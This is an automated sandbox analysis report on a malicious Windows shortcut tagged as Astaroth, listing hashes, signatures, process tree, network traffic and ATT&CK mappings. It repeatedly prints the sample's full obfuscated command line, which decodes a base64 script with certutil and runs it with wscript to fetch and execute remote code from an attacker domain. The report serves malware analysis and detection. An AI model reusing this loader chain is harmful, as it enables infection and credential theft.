Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gzLeH3Dmtn.lnk

Overview

General Information

Sample Name:gzLeH3Dmtn.lnk
Analysis ID:795670
MD5:6a04cb119228b5ca8bb2fc2f4856103f
SHA1:2f7eb865bd303466749a66e5cee8f21962d43cd0
SHA256:0135bf39f5a2167cce8af04e8eaac0caee8b52123fea1a3ec2411be0a92da400
Tags:AstarothBRAgeoGuildmalnk
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Snort IDS alert for network traffic
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • cmd.exe (PID: 5016 cmdline: C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • certutil.exe (PID: 2400 cmdline: cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS MD5: EB199893441CED4BBBCB547FE411CF2D)
    • wscript.exe (PID: 4664 cmdline: "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.4188.114.96.349692802851288 02/01/23-07:21:00.942667
SID:2851288
Source Port:49692
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2

Networking

barindex
Source: C:\Windows\System32\wscript.exeDomain query: a8eiy8.innovationsinsight.cyou
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 80Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.123.96 443Jump to behavior
Source: TrafficSnort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.4:49692 -> 188.114.96.3:80
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:21:01 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=NctGf338qS6Q8cshuHpQF7uH_MOJuTny5ADo4vU.xqk-1675232461-0-AW1Q7h5OMBuCvlggYK/BHKQyYSg3tgfvIRV9fHORHnQWMveDPLyaOdJTr2ypAAtGC4AQ5arCEIABAKODWktmY4Z2CurBlCA7OX1h8Nee2olT; path=/; expires=Wed, 01-Feb-23 06:51:01 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=4.9999998736894e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uv4Cu%2FH5ZRDqWs91VT3dCsC%2BGWzlthG4vMasGJWkt%2FsaHORTre%2BFtRjecD8DDQyi73ORgxl9At0bvivDoskcD6jynlgVCR8YlFvxCZXi6MR5WVHS423b2XGhqKRGnmUdjuCtYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnj5V9pFxnTHRN; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:21:01 GMT; HttpOnlyServer: cloudflareCF-RAY: 792895a4c8f030db-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/l
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a8eiy8.innovationsinsight.cyou/
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a8eiy8.innovationsinsight.cyou/?3/
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311600820.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310925472.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/error
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorT
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorfM
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/g
Source: unknownDNS traffic detected: queries for: a8eiy8.innovationsinsight.cyou
Source: global trafficHTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com
Source: global trafficHTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2
Source: C:\Windows\System32\certutil.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jSJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: classification engineClassification label: mal68.evad.winLNK@6/1@2/2
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH!

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310977085.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeDomain query: a8eiy8.innovationsinsight.cyou
Source: C:\Windows\System32\wscript.exeDomain query: www.cloudflare.com
Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 80Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.16.123.96 443Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\ydgc5p9\>nul 2>&1 &&s^et xehh=c:\ydgc5p9\^ydgc5p9.^js&&echo dmfyiem0nxq9innjiisicii7rdq1dd0iaxaikyj0omgio0u0nxq9ilqikyj0ucirijoio0dlde9iamvjdchdndv0k0q0nxqrrtq1dcsily9hogvpetguaw5ub3zhdglvbnnpbnnpz2h0lmn5b3uvpzmviik7>!xehh!&&certutil -f -deco^de !xehh! !xehh!&&ca^ll !xehh!
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jSJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter
Path Interception111
Process Injection
111
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Scripting
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Scripting
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer3
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://a8eiy8.innovationsinsight.cyou/0%Avira URL Cloudsafe
hTtP://a8eiy8.innovationsinsight.cyou/?3/l0%Avira URL Cloudsafe
hTtP://a8eiy8.innovationsinsight.cyou/?3/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.cloudflare.com
104.16.123.96
truefalse
    high
    a8eiy8.innovationsinsight.cyou
    188.114.96.3
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://www.cloudflare.com/cdn-cgi/errorfalse
        high
        http://a8eiy8.innovationsinsight.cyou/?3/true
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://a8eiy8.innovationsinsight.cyou/wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          hTtP://a8eiy8.innovationsinsight.cyou/?3/lwscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.cloudflare.com/gwscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://www.cloudflare.com/wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://www.cloudflare.com/cdn-cgi/errorfMwscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://www.cloudflare.com/cdn-cgi/errore.com/wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://www.cloudflare.com/cdn-cgi/errorTwscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    hTtP://a8eiy8.innovationsinsight.cyou/?3/wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    188.114.96.3
                    a8eiy8.innovationsinsight.cyouEuropean Union
                    13335CLOUDFLARENETUStrue
                    104.16.123.96
                    www.cloudflare.comUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:795670
                    Start date and time:2023-02-01 07:20:06 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 2m 57s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:4
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:gzLeH3Dmtn.lnk
                    Detection:MAL
                    Classification:mal68.evad.winLNK@6/1@2/2
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .lnk
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): conhost.exe
                    • Excluded IPs from analysis (whitelisted): 209.197.3.8
                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    188.114.96.3file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    eQcKjYOV30.exeGet hashmaliciousBrowse
                    • www.tc17.com/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    WcHjtoJIqg.exeGet hashmaliciousBrowse
                    • www.purexerxes.info/u8ow/?2duh=tbsfNZRnc6h9eO8iTqrjLUCdFMkabRU6asAa7u+SzuTpN2KjeFhLllJBqLKWY36ctDAF&-Z_lvZ=SDHdrp
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    file.exeGet hashmaliciousBrowse
                    • potunulit.org/
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    www.cloudflare.comATT81811.htmlGet hashmaliciousBrowse
                    • 104.16.124.96
                    https://app.seidat.com/presentation/shared/jJGTcgHFNaFjMofr2Get hashmaliciousBrowse
                    • 104.16.124.96
                    https://app.seidat.com/presentation/shared/HdqZQyA6vXx5LMJDeGet hashmaliciousBrowse
                    • 104.16.123.96
                    IRS-REVENUE-LETTER.HTMGet hashmaliciousBrowse
                    • 104.16.123.96
                    PayApp_EFTPay3540987.htmGet hashmaliciousBrowse
                    • 104.16.123.96
                    Pyo37mDzQ2.lnkGet hashmaliciousBrowse
                    • 104.16.123.96
                    x6V6IyDvkG.cmdGet hashmaliciousBrowse
                    • 104.16.124.96
                    https://cblay.clickfunnels.com/auto-webinar-registration1674809143095Get hashmaliciousBrowse
                    • 104.16.123.96
                    https://ppleche.blob.core.windows.net/kjhg/trial.html?sp=r&st=2023-01-26T17:09:13Z&se=2023-03-07T01:09:13Z&spr=https&sv=2021-06-08&sr=b&sig=j50cMPgmBCzZqE3hQzNzmyEzW0Ct%2FE7o0zy7ah7TYOA%3DGet hashmaliciousBrowse
                    • 104.16.124.96
                    http://ogs0inwufq6399dabccaca6.crashtrs.ruGet hashmaliciousBrowse
                    • 104.16.123.96
                    eJHvz7JQmR.lnkGet hashmaliciousBrowse
                    • 104.16.123.96
                    8XJE1azNII.cmdGet hashmaliciousBrowse
                    • 104.16.123.96
                    bwlUlnek8c.lnkGet hashmaliciousBrowse
                    • 104.16.123.96
                    https://eferreira.clickfunnels.com/webinar-registrationdxyd7k9qGet hashmaliciousBrowse
                    • 104.16.123.96
                    https://mail.turing.com/api/analytics?ti=d554d536f06a156d824003d0c664b257c1ebe0746f5c636f01cb954c5f0c4b684821ae3ba8e679c9e7728c86aa69b0b0eed472c96393f62a0c431339782e0ac4d40f4a8cad32476fff07a90a24abc253eae29ade09a4a164d68248967df03bc0b5257f664b57a390cc3682f8eca1aefd040988f60d0b6f829267aae6229c4d&rd=http://www.Xcelenergy325.pageworks.com.au/cindy.a.hoffman/Y2luZHkuYS5ob2ZmbWFuQHhjZWxlbmVyZ3kuY29tGet hashmaliciousBrowse
                    • 104.16.124.96
                    cL8CyFuzWP.lnkGet hashmaliciousBrowse
                    • 104.16.124.96
                    https://www.sipps.it/?download=1&kccpid=5733068&kcccount=///h7u77d.codesandbox.io?e=Y291cnRuZXkud2FyZGVuQGJhcm5ldC5nb3YudWs=Get hashmaliciousBrowse
                    • 104.16.124.96
                    http://9anime.toGet hashmaliciousBrowse
                    • 104.16.123.96
                    jGsBbpdEav.cmdGet hashmaliciousBrowse
                    • 104.16.124.96
                    WwfWmiTrIv.lnkGet hashmaliciousBrowse
                    • 104.16.123.96
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CLOUDFLARENETUSfile.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    39kRpZ5JDT.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    http://www.avenueis.com.auGet hashmaliciousBrowse
                    • 172.67.38.66
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.9
                    y2OSL6rKkW.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    tmpCB8E.htmGet hashmaliciousBrowse
                    • 104.17.25.14
                    5hP9peipcx.elfGet hashmaliciousBrowse
                    • 1.3.127.11
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f_20222322.htm_Get hashmaliciousBrowse
                    • 104.17.25.14
                    Ionos.htmGet hashmaliciousBrowse
                    • 104.17.25.14
                    65KUG4ai.exeGet hashmaliciousBrowse
                    • 104.20.67.143
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.9
                    https://elixirofficial.com/Get hashmaliciousBrowse
                    • 104.17.25.14
                    olgoonik_Employee-Benefits_Handbook.htmGet hashmaliciousBrowse
                    • 104.17.25.14
                    CLOUDFLARENETUSfile.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    39kRpZ5JDT.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    http://www.avenueis.com.auGet hashmaliciousBrowse
                    • 172.67.38.66
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.9
                    y2OSL6rKkW.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    tmpCB8E.htmGet hashmaliciousBrowse
                    • 104.17.25.14
                    5hP9peipcx.elfGet hashmaliciousBrowse
                    • 1.3.127.11
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    file.exeGet hashmaliciousBrowse
                    • 188.114.96.3
                    Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f_20222322.htm_Get hashmaliciousBrowse
                    • 104.17.25.14
                    Ionos.htmGet hashmaliciousBrowse
                    • 104.17.25.14
                    65KUG4ai.exeGet hashmaliciousBrowse
                    • 104.20.67.143
                    file.exeGet hashmaliciousBrowse
                    • 188.114.97.9
                    https://elixirofficial.com/Get hashmaliciousBrowse
                    • 104.17.25.14
                    olgoonik_Employee-Benefits_Handbook.htmGet hashmaliciousBrowse
                    • 104.17.25.14
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    37f463bf4616ecd445d4a1937da06e19https://thepgjplms-my.sharepoint.com/:f:/g/personal/cory_thepg_com_au/EpXiNYRo9QRKpjCh4yJpBMUBU1VJ3ZI2OF1VS_V6ap3fgQ?e=wbw0abGet hashmaliciousBrowse
                    • 104.16.123.96
                    tmpCB8E.htmGet hashmaliciousBrowse
